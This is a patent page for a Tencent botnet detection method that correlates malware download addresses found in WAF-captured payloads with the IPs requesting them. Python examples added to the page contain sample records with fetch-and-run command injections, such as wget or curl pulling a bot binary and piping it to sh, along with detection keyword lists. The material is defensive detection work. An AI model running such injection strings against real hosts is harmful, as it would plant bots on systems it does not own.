CN104796386B - Botnet detection method, device and system - Google Patents

Botnet detection method, device and system

Info

Publication number: CN104796386B
Application number: CN201410027082.9A
Authority: CN (China)
Prior art keywords: data, attack behavior, behavior data, source, source address
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN104796386A
Inventors: 江虎, 朱海星
Current assignee: Tencent Technology Shenzhen Co Ltd
Original assignee: Tencent Technology Shenzhen Co Ltd
Application filed by Tencent Technology Shenzhen Co Ltd; priority to CN201410027082.9A; published as CN104796386A, granted and published as CN104796386B.

Abstract

The invention belongs to the field of computer network security and provides a botnet detection method, device and system. The method comprises: acquiring attack behavior data captured at a network node; parsing the attack behavior data and extracting the payload data it contains; searching the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request; and determining the computers in the botnet from that source address and source IP. Compared with the prior-art approach of matching bot nicknames, the method avoids false alarms and missed detections and improves detection accuracy.

Description

Botnet detection method, device and system
Technical Field
The invention belongs to the field of computer network security, and particularly relates to a botnet detection method, device and system.
Background
A botnet is formed when one or more propagation methods are used to infect a large number of hosts with a bot program, creating a one-to-many control network between a controller and the infected hosts. The infected hosts are called bots (zombie computers), and the hosts that control them are called bot servers.
As network bandwidth and the hardware performance of computers and network equipment increase, botnets spread faster and are more active. A botnet is an attack platform from which denial-of-service attacks, spam campaigns, data theft, resource abuse, botnet-based mining and other attacks can be launched, paralysing an entire basic information network or an important application system, leaking large amounts of secret or personal data, or supporting network fraud and other criminal activity. The harm is extremely serious.
To detect botnets effectively and reduce the harm they cause, the prior art generally detects botnets by the user nickname. The nickname rules must be discovered statistically, however, so missed detections and false alarms occur and detection accuracy is low.
Disclosure of Invention
An embodiment of the invention aims to provide a botnet detection method that solves the problems of the prior art, in which detecting a botnet by user nickname is prone to missed detections and false alarms and has low detection accuracy.
An embodiment of the invention is implemented as a botnet detection method comprising the following steps:
acquiring attack behavior data captured at a network node;
parsing the attack behavior data and extracting the payload data it contains, where the payload data is the code portion of the attack behavior data that implements a malicious action;
searching for the source address from which a malicious program is downloaded and the source IP that sent the download request, the source address being contained in the payload data;
and determining the computers in the botnet from the source address and the source IP.
Another object of an embodiment of the present invention is to provide a botnet detection apparatus comprising:
a data receiving unit for acquiring attack behavior data captured at a network node;
a parsing and acquisition unit for parsing the attack behavior data and extracting the payload data it contains, where the payload data is the code portion of the attack behavior data that implements a malicious action;
a searching unit for searching for the source address from which a malicious program is downloaded and the source IP that sent the download request, the source address being contained in the payload data;
and a determining unit for determining the computers in the botnet from the source address and the source IP.
An embodiment of the invention also provides a botnet detection system comprising data capture devices deployed at each node of the monitored network and a data analysis server connected to them. The data capture devices acquire the attack behavior data passing through the network nodes; the data analysis server receives the attack behavior data captured at each node, extracts the payload data it contains, searches the payload data for the source address of the malicious program download and the source IP that sent the download request, and determines the computers in the botnet from that source address and source IP.
In the embodiments of the invention, attack behavior data captured at a network node is acquired, the payload contained in it is extracted, the source address of the malicious program download and the source IP that sent the download request are searched for in the payload, and the computers in the botnet are determined from that source address and source IP. Because this follows the behavior of a botnet as it propagates, capturing attack behavior data at the network node and locating the download source address and the requesting source IP in the payload identifies the computers in the botnet effectively.
Drawings
Fig. 1 is a flowchart of the botnet detection method according to a first embodiment of the present invention;
Fig. 2 is a flowchart of the botnet detection method according to a second embodiment of the present invention;
Fig. 3 is a schematic structural diagram of the botnet detection system according to a third embodiment of the present invention;
Fig. 4 is a schematic structural diagram of the botnet detection system according to the third embodiment of the present invention as applied to network detection;
Fig. 5 is a block diagram of the botnet detection apparatus according to a fourth embodiment of the present invention;
Fig. 6 is a schematic structural diagram of an apparatus according to a fifth embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is described in further detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
As web applications have proliferated, web servers, with their strong computing power, high processing performance and high implied value, have gradually become the main attack target, subject to injection attacks, information leakage, weak-password attacks and the like. Among these, attacks on servers by many computers controlled through a botnet are also a common form of attack.
To discover botnets in time and so find the affected computers, a common current method detects botnets by user nickname. Because the nickname of a so-called user that joins a bot server is generated by the bot program, bot nicknames follow a generation algorithm and show regularity. For example, in the IP-address style, the three-letter abbreviation of the country in which the infected host's IP address is located is placed first, followed by a random number of a specified length, such as USA|8028032 or CHA|8920340; in the operating-system style, the operating system of the infected host (xp, 2000, and so on) is placed first, followed by a random number of a specified length, such as xp|8034 or 2000|80956. These naming features can be found and summarized from the bot source code that has been obtained. The regularity of these nicknames differs from the randomness of normal IRC user nicknames, so IRC botnets in the network can be identified by matching the characteristic strings against the nicknames found in HTTP data features. However, the nickname rules in this method have to be discovered statistically, so missed detections and false alarms may occur, and detection accuracy is not high.
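As an added illustration of the prior-art heuristic just described (example code written for this page, not from the patent or from Tencent): a regular-expression matcher for the two nickname styles, applied to a handful of constructed IRC NICK lines. The digit lengths, the OS tag list, the sample lines and the addresses are assumptions; the page only says the random part has a "specified length". The sample deliberately includes one human nickname that fits the pattern (a false alarm) and one bot whose scheme differs (a missed detection), which is exactly the weakness the patent sets out to avoid.

```python
import re

# Prior-art nickname styles described on the page: a three-letter country code
# or an OS tag, a "|" separator, then a random number. The digit range and the
# OS tag list are assumptions; the page gives only examples such as USA|8028032
# and xp|8034.
COUNTRY_NICK = re.compile(r"^[A-Z]{3}\|\d{4,8}$")
OS_NICK = re.compile(r"^(?:xp|2000|2003|vista|win7)\|\d{4,8}$", re.IGNORECASE)

# IRC client registration line: "NICK <nickname>"
NICK_LINE = re.compile(r"^NICK\s+(\S+)\s*$")


def is_bot_like_nick(nick: str) -> bool:
    """True if the nickname fits one of the generated-nickname patterns."""
    return bool(COUNTRY_NICK.match(nick) or OS_NICK.match(nick))


def flag_bot_nicks(captures):
    """captures: iterable of (source_ip, irc_line). Returns the (source_ip, nick)
    pairs whose NICK command matches a bot-like pattern; other lines are ignored."""
    flagged = []
    for src_ip, line in captures:
        m = NICK_LINE.match(line.strip())
        if m and is_bot_like_nick(m.group(1)):
            flagged.append((src_ip, m.group(1)))
    return flagged


# Constructed capture, not real traffic. Addresses are from the documentation
# range 203.0.113.0/24.
SAMPLE_CAPTURE = [
    ("203.0.113.10", "NICK USA|8028032"),   # bot, country style
    ("203.0.113.11", "NICK CHA|8920340"),   # bot, country style
    ("203.0.113.12", "NICK xp|8034"),       # bot, OS style
    ("203.0.113.13", "NICK 2000|80956"),    # bot, OS style
    ("203.0.113.20", "NICK alice_w"),       # ordinary user
    ("203.0.113.21", "NICK GER|2024"),      # ordinary user whose nick fits the pattern: false alarm
    ("203.0.113.30", "NICK b0t-7781"),      # bot family with a different scheme: missed
    ("203.0.113.30", "JOIN #ctrl s3cret"),  # not a NICK line, ignored here
]

if __name__ == "__main__":
    for ip, nick in flag_bot_nicks(SAMPLE_CAPTURE):
        print(f"{ip}\t{nick}")
```

The matcher only sees what the rule writer already knew: a bot family that changes its nickname scheme is missed until someone re-derives the pattern from its source code, and any human who picks a nick in the same shape is flagged. That is the missed-report/false-report problem the patent attributes to nickname matching.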
To analyze and detect botnets quickly and effectively, the botnet detection method comprises the following steps: acquiring attack behavior data captured at a network node; parsing the attack behavior data and extracting the payload data it contains, where the payload data is the code portion of the attack behavior data that implements a malicious action; searching for the source address from which a malicious program is downloaded and the source IP that sent the download request, the source address being contained in the payload data; and determining the computers in the botnet from the source address and the source IP.
Because this follows the behavior of a botnet as it propagates, capturing the attack behavior data at the network node and locating in the payload the download source address and the source IP that sent the download request identifies the computers in the botnet effectively.
Example one:
fig. 1 shows an implementation flow of the botnet detection method provided by the first embodiment of the present invention, which is detailed as follows:
in step S101, attack behavior data captured at a network node is acquired.
Specifically, the attack behavior data captured at the network node may be captured by a web application firewall (WAF) system deployed at the node, or by an intrusion prevention system (IPS) deployed there.
An intrusion prevention system (IPS) is a computer network security device that complements antivirus software and firewalls (packet filters, application gateways). An IPS monitors the data transmission behavior of a network or network device and can immediately interrupt, adjust or isolate abnormal or harmful transmissions.
A web application firewall (WAF) differs from a traditional firewall in that it works at the application layer and inspects and protects the HTTP requests and responses flowing through it on the basis of known attack signature rules. Functionally, a WAF consists of a protection engine and a set of attack signature rules.
The protection process in a network architecture that uses a WAF is as follows: when an HTTP request from the Internet needs to reach a back-end web server, it is first forwarded by a router and filtered by a traditional firewall before reaching the WAF; the WAF's protection engine scans the received HTTP request against its rules, and when attack behavior data is found it is captured and may be handled in various ways, such as interception, dropping or disconnection; the request, after WAF processing, finally reaches the web server in the server group that it is addressed to. Of course, the WAF may also receive requests from the intranet and protect them in the same way.
The attack behavior data may be the full content of the request, or only the code portion of the request that implements the malicious behavior.
In step S102, the attack behavior data is parsed and the payload data it contains is extracted, where the payload data is the code portion of the attack behavior data that implements a malicious action.
Trojan horses and other malicious programs perform some harmful or malignant action. For example, a trojan disguises itself to entice the user to download and execute it, then opens a backdoor on the infected computer for the trojan's operator, who can freely destroy or steal the files on that computer and even control it remotely. Other malware, such as worms, spreads by continuously copying itself to other computers. The portion of code that implements these malicious actions in the attack behavior data is called the payload. Different malware performs different malicious actions, so a payload can do anything a program running in the victim's environment can do, such as corrupting or deleting files, sending sensitive information to the malware's author or any other recipient, or installing a backdoor on the infected computer.
Malware generally consists of two parts: the payload, which is the code that performs the malicious action, and an obfuscation component, which protects the malware from being detected and removed.
To analyze the malicious action effectively, the step of extracting the payload data contained in the malware, that is, parsing the attack behavior data and obtaining the payload data it contains, may specifically be:
comparing the attack behavior data with predefined keywords of malicious-action execution code, and judging whether the attack behavior data contains any of the predefined keywords;
and if a predefined keyword of malicious-action execution code is contained, determining that the line or statement in which the keyword occurs is payload data.
The predefined keywords of malicious-action execution code may be taken from the latest keyword library included with a virus database, or defined by the user as required.
In step S103, the payload data is searched for the source address of the malicious program download and the source IP from which the download request was sent.
Currently, the most common way for a botnet to propagate and expand is based on the IRC (Internet Relay Chat) protocol, an application-layer protocol that provides IRC servers and chat channels for real-time conversation. IRC uses a client/server (C/S) model: clients connect to an IRC server, users create or join channels they are interested in, and each user can send messages to every other user in the channel or to a single user privately. A channel administrator can set channel properties, such as a password or hidden mode.
An attacker writes an IRC bot of their own that supports only part of the IRC command set and interprets and executes received messages as commands. Having written the bot and set up an IRC server, the attacker implants the bot on users' computers by various means: active propagation by a worm, direct intrusion through system vulnerabilities, social engineering that tricks the user into downloading and executing the bot, e-mail or instant messaging, the DCC command of the IRC protocol for direct transfer through an IRC server, or malicious code embedded in a web page that waits for users to browse it.
When the bot runs on an infected computer it connects to the designated IRC server with a random nickname and a built-in password and joins the specified channel. The attacker can log in to the channel at any time and send an authentication message; once authenticated, the attacker immediately sends control instructions to the active bots (and to bots that are temporarily inactive). The zombie computer reads every message sent to the channel, and the channel topic, and executes it immediately if it is an instruction recognized as coming from an authenticated attacker.
Typically these instructions involve updating the bot, transferring or downloading specified files, remote-control connections, launching denial-of-service attacks, opening proxy servers, and so on.
As the bot program spreads rapidly and widely, the attacker gradually links originally unrelated computers together: they connect to the designated IRC server through the bot's preset instructions and accept the attacker's control, forming a huge network system, which is the formation of the botnet. More and more covert extended intrusions are then launched from this platform.
Therefore, as a botnet grows, malicious programs such as bots and trojans must be continuously downloaded from bot servers so that more computers are infected.
The step of searching the payload data for the source address of the malicious program download and the source IP that sent the download request may specifically include:
comparing the payload data with predefined download keywords and searching for download keywords contained in the payload data;
and determining, from the download keyword found in the payload data, the source address of the malicious program download and the source IP of the download request that correspond to that keyword.
Of course, searching for the payload data (step S102) and for the download source address and requesting source IP (step S103) by keyword is only one preferred embodiment; those skilled in the art will understand that other methods, such as program structure analysis, may also be used to find the corresponding data.
In step S104, the computers in the botnet are determined from the source address and the source IP.
According to the propagation characteristics of a botnet, a malicious-program download request issued by a botnet computer, as carried in the payload of the attack behavior data, differs from the requests of an ordinary user. Once the source address of the malicious program download and the source IP that sent the download request have been obtained from the payload data (for example, the download link that immediately follows the download command, and the source IP of the request that carries it), the addresses of the zombie computers and of the zombie server in the botnet can be obtained from that source IP information and source address information respectively.
In this embodiment of the invention, attack behavior data captured at a network node is acquired, the payload contained in it is extracted, the source address of the malicious program download and the source IP that sent the download request are searched for in the payload, and the computers in the botnet are determined from them. Because this follows the behavior of a botnet as it propagates, capturing attack behavior data at the network node and locating the download source address and the requesting source IP in the payload identifies the computers in the botnet effectively.
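The four steps of the first embodiment worked through as an added example (written for this page; it is not the patent's code and not Tencent's implementation). It takes constructed WAF capture records of the kind step S101 describes, each with the requesting source IP and the raw request, applies the keyword matching of steps S102 and S103, and produces the map from download source address to the set of source IPs that requested it, which is what step S104 works from. The keyword lists, the request samples and the addresses (documentation ranges) are all assumptions; the page says only that the keywords come from a virus keyword library or are user-defined.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlparse

# Step S102: keywords of malicious-action execution code. The page says they come
# from a virus keyword library or are user-defined; this list is an assumption.
MALICIOUS_ACTION_KEYWORDS = ("wget", "curl", "tftp", "chmod +x", "/bin/sh", "cmd.exe", "powershell")

# Step S103: download keywords. Also an assumed list.
DOWNLOAD_KEYWORDS = ("wget", "curl", "tftp")

# A download link that immediately follows a download keyword.
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";&|<>]+")

# Shell statement separators used to split an injected command into statements.
STATEMENT_SPLIT = re.compile(r"[;&|]+")


def extract_payload(attack_data: str) -> list[str]:
    """Return the lines or statements of the attack data that contain a
    malicious-action keyword (the page's definition of payload data)."""
    statements = []
    for line in attack_data.splitlines():
        decoded = unquote_plus(line)          # the WAF sees the URL-encoded form
        for stmt in STATEMENT_SPLIT.split(decoded):
            stmt = stmt.strip()
            if any(k in stmt.lower() for k in MALICIOUS_ACTION_KEYWORDS):
                statements.append(stmt)
    return statements


def find_download_sources(payload: list[str]) -> list[str]:
    """Return the download source addresses (URL hosts) named by payload
    statements that contain a download keyword."""
    hosts = []
    for stmt in payload:
        if not any(k in stmt.lower() for k in DOWNLOAD_KEYWORDS):
            continue
        for url in URL_RE.findall(stmt):
            host = urlparse(url).hostname
            if host:
                hosts.append(host)
    return hosts


def correlate(records) -> dict[str, set[str]]:
    """records: iterable of {"src_ip": ..., "body": ...} captured at the node.
    Returns {download source address: {source IPs that requested it}}."""
    by_source = defaultdict(set)
    for rec in records:
        for host in find_download_sources(extract_payload(rec["body"])):
            by_source[host].add(rec["src_ip"])
    return dict(by_source)


# Constructed capture records, not real traffic. 203.0.113.0/24 are requesters,
# 198.51.100.0/24 and 192.0.2.0/24 are the download hosts.
SAMPLE_RECORDS = [
    {"src_ip": "203.0.113.10",
     "body": "GET /cgi-bin/status.cgi?cmd=cd+/tmp%3Bwget+http://198.51.100.7/x/bot.bin+-O+.b%3Bchmod+%2Bx+.b%3B./.b"},
    {"src_ip": "203.0.113.11",
     "body": "POST /login\nuser=admin&pass=x'%3B+curl+http://198.51.100.7/x/bot.bin+-o+/tmp/.b+--"},
    {"src_ip": "203.0.113.12",
     "body": "GET /index.php?page=../../../etc/passwd"},     # an attack, but no download
    {"src_ip": "203.0.113.13",
     "body": "GET /?q=%7C%7Cwget+http://192.0.2.44/m.sh+-O-+%7Csh"},
]

if __name__ == "__main__":
    for host, ips in sorted(correlate(SAMPLE_RECORDS).items()):
        print(host, sorted(ips))
```

Statements are split on shell separators after URL-decoding the request, so a command injected into one parameter is seen as separate statements, matching the page's "line or statement in which the keyword occurs". The result is keyed by download source address on purpose: the second embodiment counts distinct requesting computers per address, and a raw list of events would lose that structure.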
Example two:
fig. 2 shows an implementation flow of the botnet detection method provided by the second embodiment of the present invention, which is detailed as follows:
in step S201, attack behavior data captured at a network node is acquired.
In step S202, the attack behavior data is analyzed, and payload data included in the attack behavior data is obtained, where the payload data is a code portion that implements a malicious action in the attack behavior data.
In step S203, a source address of the malware download included in the payload data and a source IP from which the download request is sent are searched.
In step S204, it is determined whether the number of occurrences in the payload data of the same malicious program download source address, sent by different computers, is greater than a predetermined number.
In certain circumstances a user may trigger a download request for a malicious program by mistake, for example by clicking on a malicious website; in that case the computer that accidentally triggered the download request could be misjudged.
To avoid this, step S204 of this embodiment counts how many times the same malicious program download source address appears in the payload, and step S205 makes the determination only if the count exceeds the predetermined number; otherwise, no determination is made for the time being about the computer that sent the download request or the computer corresponding to the download source address.
Furthermore, to avoid counting multiple download requests from the same computer, different computers must be distinguished when the download requests are counted, so that more meaningful statistics are obtained.
In step S205, if the number of times the same malicious program download source address was sent by different computers is greater than the predetermined number, the host corresponding to the download source address is determined to be a zombie server, and the computers corresponding to the source IPs that sent the corresponding download requests are determined to be zombie computers.
When the same malicious program download source address sent by different computers occurs more than the predetermined number of times, the malicious program downloads in the attack-request payloads from several different sources all point to the same download source, and the attack is considered botnet activity. The attack sources, that is, the senders of the corresponding download requests, are identified as compromised zombie computers; the download source, that is, the host corresponding to the malicious program download source address, is identified as a botnet node or zombie server.
Compared with the first embodiment, this embodiment adds to the botnet determination the check of whether the number of times the same malicious program download source address was sent by different computers exceeds the predetermined number, which avoids misjudgments caused by users triggering downloads by mistake and further improves detection accuracy.
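The distinct-host threshold of the second embodiment (steps S204 and S205), as an added example written for this page rather than taken from the patent. Its input is the list of (source IP, download source address) pairs that step S203 yields, here constructed by hand with documentation-range addresses; the threshold value of 3 is an assumption, since the page leaves the predetermined number open. The sample contains one download address requested by five different computers and another requested five times by the same computer, which is the accidental-trigger case the page wants left undecided.

```python
from collections import defaultdict


def classify(download_events, threshold: int = 3) -> dict:
    """download_events: iterable of (source_ip, download_source_address) pairs
    found in payload data (step S203). A download address is treated as a
    zombie server only when MORE THAN `threshold` distinct source IPs requested
    it (step S204); those IPs are then zombie computers (step S205). Addresses
    at or below the threshold are left undecided rather than marked clean.
    The threshold default is an assumption; the page does not fix a value."""
    requesters = defaultdict(set)
    occurrences = defaultdict(int)
    for src_ip, dl_addr in download_events:
        requesters[dl_addr].add(src_ip)       # distinct computers only
        occurrences[dl_addr] += 1             # raw count, kept for comparison

    result = {"zombie_servers": set(), "zombie_computers": set(), "undecided": set()}
    for dl_addr, ips in requesters.items():
        if len(ips) > threshold:
            result["zombie_servers"].add(dl_addr)
            result["zombie_computers"] |= ips
        else:
            result["undecided"].add(dl_addr)
    result["occurrences"] = dict(occurrences)
    return result


# Constructed (source IP, download source address) pairs, not real data.
SAMPLE_EVENTS = [
    ("203.0.113.10", "198.51.100.7"),
    ("203.0.113.11", "198.51.100.7"),
    ("203.0.113.12", "198.51.100.7"),
    ("203.0.113.13", "198.51.100.7"),
    ("203.0.113.14", "198.51.100.7"),
    ("203.0.113.10", "198.51.100.7"),   # repeat from the same bot, not counted twice
    ("203.0.113.50", "192.0.2.44"),     # one user retrying a download five times
    ("203.0.113.50", "192.0.2.44"),
    ("203.0.113.50", "192.0.2.44"),
    ("203.0.113.50", "192.0.2.44"),
    ("203.0.113.50", "192.0.2.44"),
]

if __name__ == "__main__":
    r = classify(SAMPLE_EVENTS)
    print("zombie servers:", sorted(r["zombie_servers"]))
    print("zombie computers:", sorted(r["zombie_computers"]))
    print("undecided:", sorted(r["undecided"]))
```

Keying on distinct source IPs is what makes the single retrying user fall below the threshold even though it produced more download requests than any one bot; a raw occurrence count would have flagged 192.0.2.44. The page does not fix a time window for the count; in practice one is needed so that the threshold is not reached by unrelated requests spread over a long period.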
Example three:
fig. 3 shows a schematic structural diagram of a botnet detection system according to a third embodiment of the present invention, which is detailed as follows:
The botnet detection system comprises data capture devices deployed at each node of the monitored network and a data analysis server connected to them. The data capture devices acquire the attack behavior data passing through the network nodes; the data analysis server receives the attack behavior data captured at each node, extracts the payload data it contains, searches the payload data for the source address of the malicious program download and the source IP that sent the download request, and determines the computers in the botnet from that source address and source IP.
In fig. 3, the network node may be a main core switch node or another important data switching device that forwards or switches data between the computers connected to it.
The data capture device may be a WAF system deployed at the network node; of course, other data filters could be used to filter out the required data, and the WAF system in fig. 3 is only one preferred embodiment.
The data analysis server connects to each data capture device, analyzes the attack behavior data the capture devices obtain, extracts the payload data contained in it, searches the payload data for the source address of the malicious program download and the source IP that sent the download request, and thereby determines the computers in the botnet.
The data analysis server is further configured to determine, in the payload data, whether the number of times the same malicious program download source address was sent by different computers is greater than a predetermined number; if so, the host corresponding to the download source address is determined to be a zombie server and the computers corresponding to the source IPs that sent the corresponding download requests are determined to be zombie computers.
The data analysis server of this embodiment may also be several data analysis servers, distributed at or integrated with the respective network node locations, or each network node may send its data to a single independent data analysis server.
Fig. 4 is an application diagram of the botnet detection system of the third embodiment. A bot server controls several zombie computers (attack source 1 to attack source N in fig. 3), which send attack behavior data containing malware to the business server through the core switch's forwarding. Once the business server is compromised it executes the corresponding operations and downloads malicious programs such as trojans, after which the bot server can control it as well. In this embodiment a WAF system is attached to the core switch in bypass (out-of-band) mode; the WAF captures the attack behavior data and forwards it to the data analysis server for analysis.
The system of this embodiment corresponds to the methods of the first and second embodiments: by capturing attack behavior data at the network node and finding in the payload the source address of the malicious program download and the source IP that sent the download request, the computers in the botnet are effectively determined.
Example four:
fig. 5 shows a block diagram of a detecting apparatus for botnets according to a fourth embodiment of the present invention, which is detailed as follows:
the detection device of the botnet in the embodiment of the invention comprises:
a data receiving unit 501, configured to acquire attack behavior data captured at a network node;
a parsing and acquisition unit 502, configured to parse the attack behavior data and extract the payload data it contains, where the payload data is the code portion of the attack behavior data that implements a malicious action;
a searching unit 503, configured to search for the source address of the malicious program download contained in the payload data and the source IP that sent the download request;
and a determining unit 504, configured to determine the computers in the botnet from the source address and the source IP.
Further, the data receiving unit 501 is specifically configured to receive attack behavior data captured at the network node by a web application firewall (WAF) system or an intrusion prevention system (IPS) deployed there.
Further, the parsing and acquisition unit 502 includes:
a first comparison subunit, configured to compare the attack behavior data with predefined keywords of malicious-action execution code and judge whether the attack behavior data contains any of them;
and a payload determining subunit, configured to determine, if a predefined keyword of malicious-action execution code is contained, that the line or statement containing it is payload data.
Further, the determining unit 504 includes:
a judging subunit, configured to judge, in the payload data, whether the number of times the same malicious program download source address was sent by different computers is greater than a predetermined number;
and, if that number is greater than the predetermined number, the host corresponding to the download source address is determined to be a zombie server and the computers corresponding to the source IPs that sent the corresponding download requests are determined to be zombie computers.
The searching unit 503 further includes:
a second comparison subunit, configured to compare the payload data with predefined download keywords and search for download keywords contained in the payload data;
and an address determining subunit, configured to determine, from the download keyword found in the payload data, the source address of the malicious program download and the source IP of the download request corresponding to that keyword.
The botnet detection apparatus of this embodiment corresponds to the botnet detection methods of the first to third embodiments and is not described again here.
Example five:
fig. 6 is a block diagram of a terminal according to a fifth embodiment of the present invention, where the terminal according to this embodiment includes: memory 620, network module 670, processor 680, and power supply 690. Those skilled in the art will appreciate that the terminal structure shown in fig. 6 is not intended to be limiting and may include more or fewer components than those shown, or some components may be combined, or a different arrangement of components may be used.
The following describes each constituent element of the terminal in detail with reference to fig. 6:
the memory 620 may be used to store software programs and modules, and the processor 680 executes the various functional applications and data processing of the terminal by running the software programs and modules stored in the memory 620. The memory 620 may mainly include a program storage area and a data storage area, wherein the program storage area may store an operating system, an application program required by at least one function (such as a sound playing function, an image playing function, etc.), and the like; the data storage area may store data (such as audio data, a phonebook, etc.) created according to the use of the terminal, etc. Further, the memory 620 may include high-speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other non-volatile solid-state storage device.
The network module 670 may include a wireless fidelity (WiFi) module, a wired network module or a radio frequency module. The WiFi module is a short-range wireless transmission technology; through the network module 670 the terminal may help the user send and receive e-mails, browse web pages, access streaming media, etc., providing the user with wireless broadband internet access. Although fig. 6 shows the network module 670, it is understood that it is not an essential component of the terminal and may be omitted entirely as needed without changing the essence of the invention.
The processor 680 is the control center of the terminal, connects the various parts of the entire terminal through various interfaces and lines, and performs the various functions of the terminal and processes data by running or executing the software programs and/or modules stored in the memory 620 and calling the data stored in the memory 620, thereby monitoring the terminal as a whole. Optionally, processor 680 may include one or more processing units; preferably, the processor 680 may integrate an application processor, which mainly handles the operating system, user interface, application programs, etc., and a modem processor, which mainly handles wireless communications. It will be appreciated that the modem processor described above need not be integrated into processor 680.
The terminal also includes a power supply 690 (e.g., a battery) for powering the various components. Preferably, the power supply is logically coupled to the processor 680 via a power management system, which manages charging, discharging, and power consumption.
Although not shown, the terminal may further include an input device, a display device, an audio circuit, a camera, a bluetooth module, and the like, which are not described herein again.
In the embodiment of the present invention, the processor 680 included in the terminal further has the following functions: a method of performing botnet detection, comprising:
acquiring attack behavior data captured at a network node;
analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data;
and determining the computers in the botnet according to the source address and the source IP.
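The pipeline the processor is described as executing above (and that the device units 502 to 504 implement) is compact enough to show end to end. The following is an added example written for this page, not code from the patent or its assignee: the malicious-action keyword list, the download keyword list, the threshold and the WAF-style capture records are all constructed assumptions, since the patent names none of them concretely.

```python
"""Botnet detection as claimed: WAF captures -> payload -> download source -> threshold."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumed predefined keyword sets (the patent does not fix either list).
MALICIOUS_ACTION_KEYWORDS = ("system(", "exec(", "eval(", "passthru(", "shell_exec(")
DOWNLOAD_KEYWORDS = ("wget", "curl", "fetch")
# A URL that follows a download keyword inside one statement.
_URL_RE = re.compile(r"(?:wget|curl|fetch)\b[^;|&\n]*?(https?://[^\s;'\"|&]+)")

def extract_payload(attack_data: str) -> list[str]:
    """Step 2: keep only the lines/statements containing a malicious-action keyword."""
    return [s.strip() for s in re.split(r"[\n;]", attack_data)
            if any(k in s for k in MALICIOUS_ACTION_KEYWORDS)]

def find_download_sources(payload: list[str]) -> list[str]:
    """Step 3: for each download keyword in the payload, return the download source host."""
    hosts = []
    for statement in payload:
        if any(k in statement for k in DOWNLOAD_KEYWORDS):
            for url in _URL_RE.findall(statement):
                host = urlparse(url).hostname
                if host:
                    hosts.append(host)
    return hosts

def detect_botnet(records, threshold: int):
    """Step 4: a download source requested by more *distinct* source IPs than the
    threshold is a zombie server; the requesting IPs are zombie computers."""
    requesters = defaultdict(set)          # download host -> set of source IPs
    for source_ip, attack_data in records:
        for host in find_download_sources(extract_payload(attack_data)):
            requesters[host].add(source_ip)
    zombie_servers = {h: ips for h, ips in requesters.items() if len(ips) > threshold}
    zombie_computers = set().union(*zombie_servers.values())
    return zombie_servers, zombie_computers

# Constructed sample captures: (source IP, request content seen by the WAF).
SAMPLE_RECORDS = [
    ("203.0.113.10", 'GET /index.php?cmd=system("wget http://malware.example.test/bot.sh -O /tmp/b")'),
    ("203.0.113.11", "POST /upload.php\n<?php system('curl http://malware.example.test/bot.sh | sh'); ?>"),
    ("203.0.113.12", 'id=1; exec("wget http://malware.example.test/bot.sh")'),
    ("203.0.113.13", "GET /?q=eval(base64_decode('...'))"),                 # payload, but no download
    ("198.51.100.7", "GET /blog?search=how to wget http://docs.example.test/manual.pdf"),  # no action keyword
    ("203.0.113.10", 'GET /index.php?cmd=system("wget http://malware.example.test/bot.sh")'),   # same IP again
]

if __name__ == "__main__":
    servers, bots = detect_botnet(SAMPLE_RECORDS, threshold=2)
    print("zombie servers:", servers)      # {'malware.example.test': {3 source IPs}}
    print("zombie computers:", sorted(bots))
```

The two-stage filter is what separates this from plain URL matching: the benign search query that merely contains "wget" never becomes payload, and the repeated request from 203.0.113.10 counts once because the threshold is over distinct requesting computers.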
The above description is only for the purpose of illustrating the preferred embodiments of the present invention and is not to be construed as limiting the invention, and any modifications, equivalents and improvements made within the spirit and principle of the present invention are intended to be included within the scope of the present invention.

Claims (12)

1. A botnet detection method, the method comprising:
acquiring attack behavior data captured at a network node;
analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
comparing the payload data with predefined download keywords, and searching for the download keywords included in the payload data;
according to the downloading keywords searched in the payload data, determining a source address of malicious program downloading and a source IP for sending a downloading request, which correspond to the downloading keywords;
and determining the computers in the botnet according to the source address and the source IP.
2. The method according to claim 1, wherein the step of obtaining attack behavior data captured at the network node specifically comprises:
receiving attack behavior data captured by a network node, wherein the attack behavior data is the attack behavior data captured by a Web Application Firewall (WAF) system or an Intrusion Prevention System (IPS) arranged at the network node.
3. The method of claim 1, wherein the parsing the attack behavior data and obtaining payload data included in the attack behavior data comprises:
comparing the attack behavior data with the keywords of the predefined malicious action execution code, and judging whether the keywords of the predefined malicious action execution code are included in the attack behavior data;
and if the keywords of the predefined malicious action execution code are included, determining that the line or the statement where the keywords of the malicious action execution code are located is payload data.
4. The method of claim 1, wherein the determining the computers in the botnet based on the source address and the source IP is specifically:
judging whether the times of the same malicious program downloading source addresses sent by different computers are greater than the preset times or not in the payload data;
if the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the host corresponding to the malicious program downloading source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding downloading request is determined as a zombie computer.
5. A botnet detection apparatus, the apparatus comprising:
the data receiving unit is used for acquiring attack behavior data captured at a network node;
the analysis acquisition unit is used for analyzing the attack behavior data and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
a searching unit, configured to search for a source address of malicious program downloading and a source IP for sending a downloading request included in the payload data, where the searching unit includes: a second comparing subunit, configured to compare the payload data with a predefined download keyword, and search for the download keyword included in the payload data; an address determining subunit, configured to determine, according to a download keyword found in the payload data, a source address of malicious program download corresponding to the download keyword and a source IP for sending a download request;
a determining unit for determining a computer in the botnet according to the source address and the source IP.
6. The apparatus according to claim 5, wherein the data receiving unit is specifically configured to receive attack behavior data captured by a network node, where the attack behavior data is captured by a Web Application Firewall (WAF) system or an Intrusion Prevention System (IPS) provided at the network node.
